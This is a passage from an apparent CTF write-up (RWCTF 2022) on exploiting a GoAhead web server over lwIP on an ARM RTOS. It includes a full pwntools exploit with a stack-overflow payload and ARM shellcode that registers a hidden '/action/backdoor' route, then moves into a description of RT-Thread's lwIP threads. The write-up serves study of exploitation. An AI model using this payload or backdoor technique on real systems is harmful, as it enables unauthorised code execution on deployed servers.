(<span class="built_in">smatch</span>(status, <span class="string">&quot;*&quot;</span>)) &#123;</span><br><span class="line">                            status = <span class="string">&quot;0&quot;</span>;</span><br><span class="line">                        &#125;</span><br><span class="line">                    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                        status = <span class="string">&quot;0&quot;</span>;</span><br><span class="line">                        redirectUri = value;</span><br><span class="line">                    &#125;</span><br><span class="line">                    ...</span><br><span class="line">                &#125; ...</span><br><span class="line">                &#125; <span class="keyword">else</span> <span class="keyword">if</span> (<span class="built_in">smatch</span>(key, <span class="string">&quot;uri&quot;</span>)) &#123;</span><br><span class="line">                    uri = value;</span><br><span class="line">                &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                    <span class="built_in">error</span>(<span class="string">&quot;Bad route keyword %s&quot;</span>, key);</span><br><span class="line">                    <span class="keyword">continue</span>;</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">if</span> ((route = <span class="built_in">websAddRoute</span>(uri, handler, <span class="number">-1</span>)) == <span class="number">0</span>) &#123;</span><br><span class="line">                rc = <span class="number">-1</span>;</span><br><span class="line">                <span class="keyword">break</span>;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="built_in">websSetRouteMatch</span>(route, dir, protocol, methods, extensions, abilities, 
redirects);</span><br><span class="line"><span class="meta">#<span class="keyword">if</span> ME_GOAHEAD_AUTH</span></span><br><span class="line">            <span class="keyword">if</span> (auth &amp;&amp; <span class="built_in">websSetRouteAuth</span>(route, auth) &lt; <span class="number">0</span>) &#123;</span><br><span class="line">                rc = <span class="number">-1</span>;</span><br><span class="line">                <span class="keyword">break</span>;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125; ...</span><br><span class="line">    &#125;</span><br><span class="line">    ...</span><br><span class="line">    <span class="keyword">return</span> rc;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Reading through the source shows that a single call to <code>websAddRoute(&quot;/action/backdoor&quot;, &quot;action&quot;, 0)</code> is enough to register the backdoor route in the route table, and the third argument lets us place it at the very front of the table.</p><p>By default a route's other fields are unset (-1), so dir, protocol, methods and so on play no part in route matching. That means we do not need to call the <code>websSetRouteMatch</code> function that follows it in <code>websLoad</code>.</p></li></ul><h3 id="d-遇到的其他坑点">d. 
Other pitfalls</h3><p>A few more problems came up while writing the exploit:</p><ul><li><p>The submitted shellcode gets URL-encoded by GoAhead:</p><p><img src="/2022/01/rwctf2022_flag/image-20220130113744939.png" alt="image-20220130113744939"></p><p>So when sending the submit request, add an HTTP header that explicitly tells GoAhead no encoding is needed:</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attr">&quot;Content-Type&quot;</span><span class="punctuation">:</span><span class="string">&quot;application/x-www-form-urlencoded&quot;</span></span><br></pre></td></tr></table></figure><p>Note that once this header is set, the data you send <strong>must not be json</strong> (that is, do not send <code>&#123;'word': shellcode&#125;</code>), because that still causes the remote side to ignore the header and URL-encode the body.</p></li><li><p>pwntools fails while assembling the shellcode: <code>pwnlib.exception.PwnlibException: Could not find 'as' installed for ContextType(arch = 'arm', bits = 32, encoding = 'latin', endian = 'little', log_level = 10, os = 'linux')</code></p><p>This happens because the ARM binutils toolchain was not installed on my machine. The following command installs it:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> apt-get install binutils-arm-linux-gnueabi</span><br></pre></td></tr></table></figure></li><li><p>In gdb with pwndbg, <code>p/x $fp</code> prints the value of <code>$sp</code>, even though <code>$fp</code> and <code>$r11</code> are the same register. This is odd and may be a gdb bug.</p></li><li><p>If either of the following happens, you need to <strong>reboot Linux (restarting qemu no longer helps)</strong>, or simply debug inside Docker:</p><ul><li><p>The <strong>shellcode address</strong> found with gdb <code>find</code> <strong>is not fixed</strong></p></li><li><p>On <strong>every</strong> run, <strong>several pointer values</strong> in the stack data around the overflow are different</p><blockquote><p>In my own debugging, at most <strong>one non-pointer value</strong> on the stack normally changes on <strong>each</strong> run, and it does not affect program execution.</p></blockquote></li></ul></li></ul><h3 id="e-本地-exploit">e. 
Local exploit</h3><blockquote><p>I never tested this against the remote target, because the remote service had already been shut down…</p></blockquote><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span 
class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span 
class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span 
class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#! python3</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">context(</span><br><span class="line">    arch=<span class="string">&#x27;arm&#x27;</span>,</span><br><span class="line">    bits=<span class="number">32</span>,</span><br><span class="line">    encoding=<span class="string">&#x27;latin&#x27;</span>,</span><br><span class="line">    log_level=<span class="string">&quot;info&quot;</span></span><br><span class="line">)</span><br><span class="line"></span><br><span class="line">baseURL = <span class="string">&quot;http://localhost:5555&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">create_session</span>():</span><br><span class="line">    session = requests.session()</span><br><span class="line">    login_data = &#123;<span class="string">&quot;username&quot;</span>: <span class="string">&quot;admin&quot;</span>, <span class="string">&quot;password&quot;</span>: <span class="string">&quot;admin&quot;</span>&#125;</span><br><span class="line">    res = session.post(url=baseURL+<span 
class="string">&quot;/action/login&quot;</span>, data=login_data)</span><br><span class="line">    <span class="keyword">assert</span> res.status_code == <span class="number">200</span></span><br><span class="line">    <span class="keyword">return</span> session</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">submit_msg</span>(<span class="params">session, msg</span>):</span><br><span class="line">    <span class="comment"># submit_data = msg # &#123;&quot;word&quot;: msg&#125;</span></span><br><span class="line">    </span><br><span class="line">    res = session.post(</span><br><span class="line">        url=baseURL+<span class="string">&quot;/action/submit&quot;</span>, </span><br><span class="line">        headers=&#123; <span class="string">&quot;Content-Type&quot;</span>:<span class="string">&quot;application/x-www-form-urlencoded&quot;</span> &#125;,</span><br><span class="line">        data=msg)</span><br><span class="line">    <span class="keyword">assert</span> res.status_code == <span class="number">200</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># def get_last_submit_msg(session):</span></span><br><span class="line"><span class="comment">#     res = session.get(url=baseURL+&quot;/submit.jst&quot;)</span></span><br><span class="line"><span class="comment">#     assert res.status_code == 200</span></span><br><span class="line"><span class="comment">#     return res.content</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">execute_shellcode</span>(<span class="params">shellcode_addr=<span class="number">0x6004cb30</span></span>):</span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">send_packet</span>(<span class="params">packet_len, data=<span class="string">b&#x27;&#x27;</span></span>):</span><br><span class="line">     
   p = remote(<span class="string">&quot;127.0.0.1&quot;</span>, <span class="number">5555</span>)</span><br><span class="line">        remain_len = packet_len - <span class="built_in">len</span>(data)</span><br><span class="line">        <span class="keyword">assert</span> remain_len &gt;= <span class="number">0</span></span><br><span class="line">        p.send(data + <span class="string">b&quot;*&quot;</span> * remain_len)</span><br><span class="line">        p.close()</span><br><span class="line">        time.sleep(<span class="number">0.3</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> ch <span class="keyword">in</span> <span class="string">&quot;backdoor&quot;</span>: <span class="comment"># \x62 \x61 \x63 \x6b \x64 \x6f \x6f \x72</span></span><br><span class="line">        send_packet(<span class="built_in">ord</span>(ch) - <span class="number">0x3a</span>)</span><br><span class="line">    send_packet(<span class="number">0x202</span> - <span class="number">0x3a</span>, flat(</span><br><span class="line">        <span class="string">&quot;-&quot;</span>*<span class="number">0xa</span>,</span><br><span class="line">        <span class="number">0x6b636162</span>,      <span class="number">0x726f6f64</span>,      <span class="number">0x60e4297c</span>,      <span class="number">0x00000202</span>,</span><br><span class="line">        <span class="number">0x02020000</span>,      <span class="number">0x609a4208</span>,      <span class="number">0x61cd29f8</span>,      <span class="number">0xffffffff</span>,</span><br><span class="line">        <span class="number">0x61cd27e4</span>,      <span class="number">0x60e52d58</span>,      <span class="number">0x04040404</span>,      <span class="number">0x60e429d4</span>,</span><br><span class="line">        shellcode_addr,  <span class="number">0x06060606</span>,      <span class="number">0x00000000</span>,      <span 
class="number">0x08080808</span>,</span><br><span class="line">        <span class="number">0x609a4208</span>,      <span class="number">0x61cd278c</span>,      <span class="number">0x6000001f</span>,      <span class="number">0x00000001</span>,</span><br><span class="line">        <span class="number">0x2000001f</span>,      <span class="number">0x11111111</span>,      <span class="number">0x00000000</span>,      <span class="number">0x00000000</span>,</span><br><span class="line">        <span class="number">0x00000000</span>,      <span class="number">0x00000000</span>,      <span class="number">0x00000000</span>,      <span class="number">0x00000000</span>,</span><br><span class="line">        <span class="number">0x80000068</span>,      <span class="number">0x60e428e8</span>,      <span class="number">0x00000000</span>,      <span class="number">0x60e52cf4</span>,</span><br><span class="line">        <span class="number">0x609a40e4</span>,      <span class="number">0x60e429f0</span>,      <span class="number">0x609a40dc</span>,      <span class="number">0x00000001</span>,</span><br><span class="line">        <span class="number">0x60e3a994</span>,      <span class="number">0x60e3a994</span>,      <span class="number">0x60e429f0</span>,      <span class="number">0x00000000</span>,</span><br><span class="line">        <span class="number">0x00000006</span>,      <span class="number">0x60e3a9e8</span>,      <span class="number">0x00787265</span>,      <span class="number">0x00000000</span>,</span><br><span class="line">        <span class="number">0x00000000</span>,      <span class="number">0x00000005</span>,      <span class="number">0x00000000</span>,      <span class="number">0x00000006</span>,</span><br><span class="line">        <span class="number">0x00000000</span>,      <span class="number">0x0000007e</span>,      <span class="number">0x00000000</span>,      <span class="number">0x00000000</span>,</span><br><span class="line">        <span 
class="number">0x00000000</span>,      <span class="number">0x00000000</span>,      <span class="number">0x80000080</span>,      <span class="number">0x60e42aac</span>,</span><br><span class="line">        <span class="number">0x60e42ac0</span>,      <span class="number">0x60e42acc</span>,      <span class="number">0x60e42abc</span>,      <span class="number">0x00000000</span>,</span><br><span class="line">        <span class="number">0x60e42a70</span>,      <span class="number">0xffffffff</span>,      <span class="number">0x60e42a70</span>,      <span class="number">0x60e42a70</span>,</span><br><span class="line">        <span class="number">0x00000001</span>,      <span class="number">0x60e42a84</span>,      <span class="number">0xffffffff</span>,      <span class="number">0x60e4aaf8</span>,</span><br><span class="line">        <span class="number">0x60e4aaf8</span>,      <span class="number">0x00000000</span>,      <span class="number">0x00000008</span>,      <span class="number">0x00000004</span>,</span><br><span class="line">        <span class="number">0x0000ffff</span>,      <span class="number">0x00000000</span>,      <span class="number">0x00000000</span>,      <span class="number">0x00000000</span>,</span><br><span class="line">        <span class="number">0x60e52bc4</span>,      <span class="number">0x60e52a9c</span>,      <span class="number">0x60e52ab4</span>,      <span class="number">0x60e72954</span>,</span><br><span class="line">        <span class="number">0x60e52a9c</span>,      <span class="number">0x60e52a9c</span>,      <span class="number">0x60e52ab4</span>,      <span class="number">0x60e72954</span>,</span><br><span class="line">        <span class="number">0x00000000</span>,      <span class="number">0x00000000</span>,      <span class="number">0x80008008</span>,      <span class="number">0xa5a5a5a5</span>,</span><br><span class="line">        <span class="number">0xa5a5a5a5</span>,      <span class="number">0xa5a5a5a5</span>,      <span 
class="number">0xa5a5a5a5</span>,      <span class="number">0xa5a5a5a5</span>,</span><br><span class="line">        <span class="number">0xa5a5a5a5</span>,      <span class="number">0xa5a5a5a5</span>,      <span class="number">0xa5a5a5a5</span>,      <span class="number">0xa5a5a5a5</span>,</span><br><span class="line">        <span class="number">0xa5a5a5a5</span>,      <span class="number">0xa5a5a5a5</span>,      <span class="number">0xa5a5a5a5</span>,      <span class="number">0xa5a5a5a5</span>,</span><br><span class="line">        <span class="number">0xa5a5a5a5</span>,      <span class="number">0xa5a5a5a5</span>,      <span class="number">0xa5a5a5a5</span>,      <span class="number">0xa5a5a5a5</span>,</span><br><span class="line">        <span class="number">0xa5a5a5a5</span>,      <span class="number">0xa5a5a5a5</span>,      <span class="number">0xa5a5a5a5</span>,      <span class="number">0xa5a5a5a5</span>,</span><br><span class="line">        <span class="number">0xa5a5a5a5</span>,      <span class="number">0xa5a5a5a5</span>,      <span class="number">0xa5a5a5a5</span>,      <span class="string">&quot;\xa5\xa5&quot;</span>,</span><br><span class="line">    ))</span><br><span class="line"></span><br><span class="line">shellcode_addr = <span class="number">0x60d9c588</span></span><br><span class="line">sc_bytecode = asm(vma=shellcode_addr, shellcode=<span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">    // save all registers</span></span><br><span class="line"><span class="string">    push &#123;r0-r11&#125;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    // memcpy handler to /log_err.html + 0x200</span></span><br><span class="line"><span class="string">    ldr r0, =0x606D3aD0 </span></span><br><span class="line"><span class="string">    ldr r1, =backdoor_handler </span></span><br><span class="line"><span class="string">    ldr r2, =0x200        
 </span></span><br><span class="line"><span class="string">    ldr r3, =0x60021704 </span></span><br><span class="line"><span class="string">    BL call</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    // call websDefineAction(&quot;backdoor&quot;, backdoor_handler)</span></span><br><span class="line"><span class="string">    ldr r0, =backdoor     </span></span><br><span class="line"><span class="string">    ldr r1, =0x606D3aD0   </span></span><br><span class="line"><span class="string">    ldr r3, =0x6004D28C   </span></span><br><span class="line"><span class="string">    BL call</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    // rt_printf status</span></span><br><span class="line"><span class="string">    mov r1, r0</span></span><br><span class="line"><span class="string">    ldr r0, =rt_printf_fmt</span></span><br><span class="line"><span class="string">    ldr r3, =0x6002111C</span></span><br><span class="line"><span class="string">    BL call</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    // websAddRoute(&quot;/action/backdoor&quot;, &quot;action&quot;, 0)</span></span><br><span class="line"><span class="string">    ldr r0, =route_path</span></span><br><span class="line"><span class="string">    ldr r1, =route_handler</span></span><br><span class="line"><span class="string">    mov r2, 0</span></span><br><span class="line"><span class="string">    ldr r3, =0x600636A0</span></span><br><span class="line"><span class="string">    BL call</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    // pop all registers</span></span><br><span class="line"><span class="string">    pop &#123;r0-r11&#125;</span></span><br><span class="line"><span class="string"></span></span><br><span 
class="line"><span class="string">    // return to origin</span></span><br><span class="line"><span class="string">    ldr pc, =0x6004cb30</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">/* ----------- backdoor_handler ----------- */</span></span><br><span class="line"><span class="string">backdoor_handler:</span></span><br><span class="line"><span class="string">    push &#123;r1-r11, lr&#125;</span></span><br><span class="line"><span class="string">    push &#123;r0&#125;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    // char* name = websGetVar(wp, key, key);</span></span><br><span class="line"><span class="string">    ldr r0, [sp]</span></span><br><span class="line"><span class="string">    ldr r1, =flag</span></span><br><span class="line"><span class="string">    ldr r2, =flag</span></span><br><span class="line"><span class="string">    ldr r3, =0x600577C4</span></span><br><span class="line"><span class="string">    BL call</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    // memcpy to 404 data</span></span><br><span class="line"><span class="string">    mov r1, r0</span></span><br><span class="line"><span class="string">    ldr r0, =0x60076824</span></span><br><span class="line"><span class="string">    // ldr r1, =success_page  </span></span><br><span class="line"><span class="string">    ldr r2, =23          </span></span><br><span class="line"><span class="string">    ldr r3, =0x60021704</span></span><br><span class="line"><span class="string">    BL call</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    // websSetStatus(wp, 200)</span></span><br><span class="line"><span class="string">    ldr r0, [sp]</span></span><br><span class="line"><span class="string">    ldr r1, 
=200</span></span><br><span class="line"><span class="string">    ldr r3, =0x600588C4</span></span><br><span class="line"><span class="string">    BL call</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    // websWriteHeaders(wp, -1, 0)</span></span><br><span class="line"><span class="string">    ldr r0, [sp]</span></span><br><span class="line"><span class="string">    ldr r1, =-1</span></span><br><span class="line"><span class="string">    ldr r2, =0</span></span><br><span class="line"><span class="string">    ldr r3, =0x6005891C</span></span><br><span class="line"><span class="string">    BL call</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    // websWriteEndHeaders(wp)</span></span><br><span class="line"><span class="string">    ldr r0, [sp]</span></span><br><span class="line"><span class="string">    ldr r3, =0x60058D30</span></span><br><span class="line"><span class="string">    BL call</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    // websWrite(wp, page)</span></span><br><span class="line"><span class="string">    ldr r0, [sp]</span></span><br><span class="line"><span class="string">    ldr r1, =success_page</span></span><br><span class="line"><span class="string">    ldr r3, =0x60058E2C</span></span><br><span class="line"><span class="string">    BL call</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    // websDone(wp)</span></span><br><span class="line"><span class="string">    ldr r0, [sp]</span></span><br><span class="line"><span class="string">    ldr r3, =0x6005496C</span></span><br><span class="line"><span class="string">    BL call</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    pop 
&#123;r0&#125;</span></span><br><span class="line"><span class="string">    pop &#123;r1-r11, pc&#125;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">call: // manual implementation of call r3 (pc reads as current+8, so lr ends up pointing at the pop below)</span></span><br><span class="line"><span class="string">    push &#123;lr&#125;</span></span><br><span class="line"><span class="string">    mov lr, pc</span></span><br><span class="line"><span class="string">    add lr, lr, 4</span></span><br><span class="line"><span class="string">    mov pc, r3 </span></span><br><span class="line"><span class="string">    pop &#123;pc&#125;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">flag:           .asciz  &quot;flag&quot;</span></span><br><span class="line"><span class="string">backdoor:       .asciz  &quot;backdoor&quot;</span></span><br><span class="line"><span class="string">success_page:   .asciz  &quot;&#123;\\&quot;status\\&quot; : \\&quot;success\\&quot;&#125;&quot;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">route_path:     .asciz  &quot;/action/backdoor&quot;</span></span><br><span class="line"><span class="string">route_handler:  .asciz  &quot;action&quot;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">rt_printf_fmt:  .asciz  &quot;shellcode status: %d\\n&quot;</span></span><br><span class="line"><span class="string">backdoor_fmt:   .asciz  &quot;backdoor: %s\\n&quot;</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>: </span><br><span class="line">    <span class="comment"># Start qemu</span></span><br><span class="line">    p = process(<span 
class="string">&quot;./dbg.sh&quot;</span>)</span><br><span class="line">    p.recvuntil(<span class="string">&quot;lwIP-2.1.3 initialized!&quot;</span>)</span><br><span class="line">    time.sleep(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">    <span class="comment"># Send and execute the shellcode</span></span><br><span class="line">    log.info(<span class="string">&quot;exploiting...&quot;</span>)</span><br><span class="line">    session = create_session()</span><br><span class="line">    submit_msg(session, <span class="string">b&quot;ShellcodeHeader&quot;</span> + sc_bytecode)</span><br><span class="line">    execute_shellcode(shellcode_addr)</span><br><span class="line"></span><br><span class="line">    <span class="comment"># Run the health check manually and retrieve the flag</span></span><br><span class="line">    <span class="comment"># print(p.recvall(timeout=1))</span></span><br><span class="line">    <span class="comment"># os.system(&quot;python3 ./flag.py&quot;)</span></span><br><span class="line">    p.interactive()</span><br></pre></td></tr></table></figure><p>Result:</p><p><img src="/2022/01/rwctf2022_flag/image-20220131114450939.png" alt="image-20220131114450939"></p><h2 id="七、RT-thread-–-lwIP">VII. RT-Thread – lwIP</h2><p>That concludes the write-up for this challenge. Next, let's briefly go beyond it.</p><h3 id="a-Overview">a. 
Overview</h3><p>The lwIP stack in this challenge's FreeRTOS build is the one shipped with RT-Thread (an RTOS developed in China).</p><blockquote><p>According to the challenge author, RT-Thread's lwIP was used because it is easier to debug.</p><p>Writing challenges isn't easy either…</p></blockquote><p>lwIP is a small open-source TCP/IP stack that focuses on reducing RAM usage while keeping the main features of TCP, which makes it a good fit for embedded systems. In RT-Thread, the driver architecture of the stack looks like this:</p><p><img src="/2022/01/rwctf2022_flag/an010_lwip_block.png" alt="驱动架构图"></p><p>On top of upstream lwIP, RT-Thread adds a network device layer. This layer handles Ethernet transmit and receive with <strong>two independent threads</strong>.</p><p><img src="/2022/01/rwctf2022_flag/an010_rt_xxx_eth_rx.png" alt="数据接收流程"></p><p>When the Ethernet hardware receives a packet, it places the data in a buffer and raises a hardware interrupt. The registered interrupt handler sends a mail to notify the receive thread erx, which allocates a pbuf sized to the packet, reads the data in, and, once reception is complete, sends another mail to wake the TCP/IP thread for further processing.</p><p><img src="/2022/01/rwctf2022_flag/etx.png" alt="数据发送流程"></p><p>When there is data to send, lwIP posts a request to the etx thread by mail and then waits indefinitely on the tx_ack semaphore until transmission finishes. Once the etx thread has sent the data, it signals tx_ack to tell lwIP that transmission is complete.</p><p>Next, let's take a brief look at how this send/receive path works.</p><h3 id="b-lwip-init">b. lwip_init</h3><p>During startup, the RTOS runs <code>lwip_system_init</code> to perform a series of initialization steps.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * LwIP system initialization</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="keyword">extern</span> <span class="type">int</span> <span class="title">eth_system_device_init_private</span><span class="params">(<span class="type">void</span>)</span></span>;</span><br><span class="line"><span class="function"><span 
class="type">int</span> <span class="title">lwip_system_init</span><span class="params">(<span class="type">void</span>)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    ...</span><br><span class="line">    <span class="built_in">eth_system_device_init_private</span>();</span><br><span class="line">    ...</span><br><span class="line">    <span class="built_in">tcpip_init</span>(tcpip_init_done_callback, (<span class="type">void</span> *)&amp;done_sem);</span><br><span class="line">    ...</span><br><span class="line">    <span class="built_in">rt_kprintf</span>(<span class="string">&quot;lwIP-%d.%d.%d initialized!\n&quot;</span>, LWIP_VERSION_MAJOR, LWIP_VERSION_MINOR, LWIP_VERSION_REVISION);</span><br><span class="line">    ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>This function:</p><ul><li>Calls <code>eth_system_device_init_private</code> to initialize the erx and etx threads.</li><li>Calls <code>tcpip_init</code> to create the tcpip thread.</li><li>Prints a banner. Note that it matches what the challenge prints.</li></ul><p>Here we only care about <code>eth_system_device_init_private</code>, which does just two things: it creates the etx and erx threads, and it creates their mailboxes.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span 
class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> <span class="title">eth_system_device_init_private</span><span class="params">(<span class="type">void</span>)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="type">rt_err_t</span> result = RT_EOK;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* initialize Rx thread. */</span></span><br><span class="line"><span class="meta">#<span class="keyword">ifndef</span> LWIP_NO_RX_THREAD</span></span><br><span class="line">    <span class="comment">/* initialize mailbox and create Ethernet Rx thread */</span></span><br><span class="line">    result = <span class="built_in">rt_mb_init</span>(&amp;eth_rx_thread_mb, <span class="string">&quot;erxmb&quot;</span>,</span><br><span class="line">                        &amp;eth_rx_thread_mb_pool[<span class="number">0</span>], <span class="built_in">sizeof</span>(eth_rx_thread_mb_pool)/<span class="number">4</span>,</span><br><span class="line">                        RT_IPC_FLAG_FIFO);</span><br><span class="line">    <span class="built_in">RT_ASSERT</span>(result == RT_EOK);</span><br><span class="line"></span><br><span class="line">    result = <span class="built_in">rt_thread_init</span>(&amp;eth_rx_thread, <span class="string">&quot;erx&quot;</span>, eth_rx_thread_entry, RT_NULL,</span><br><span class="line">                            
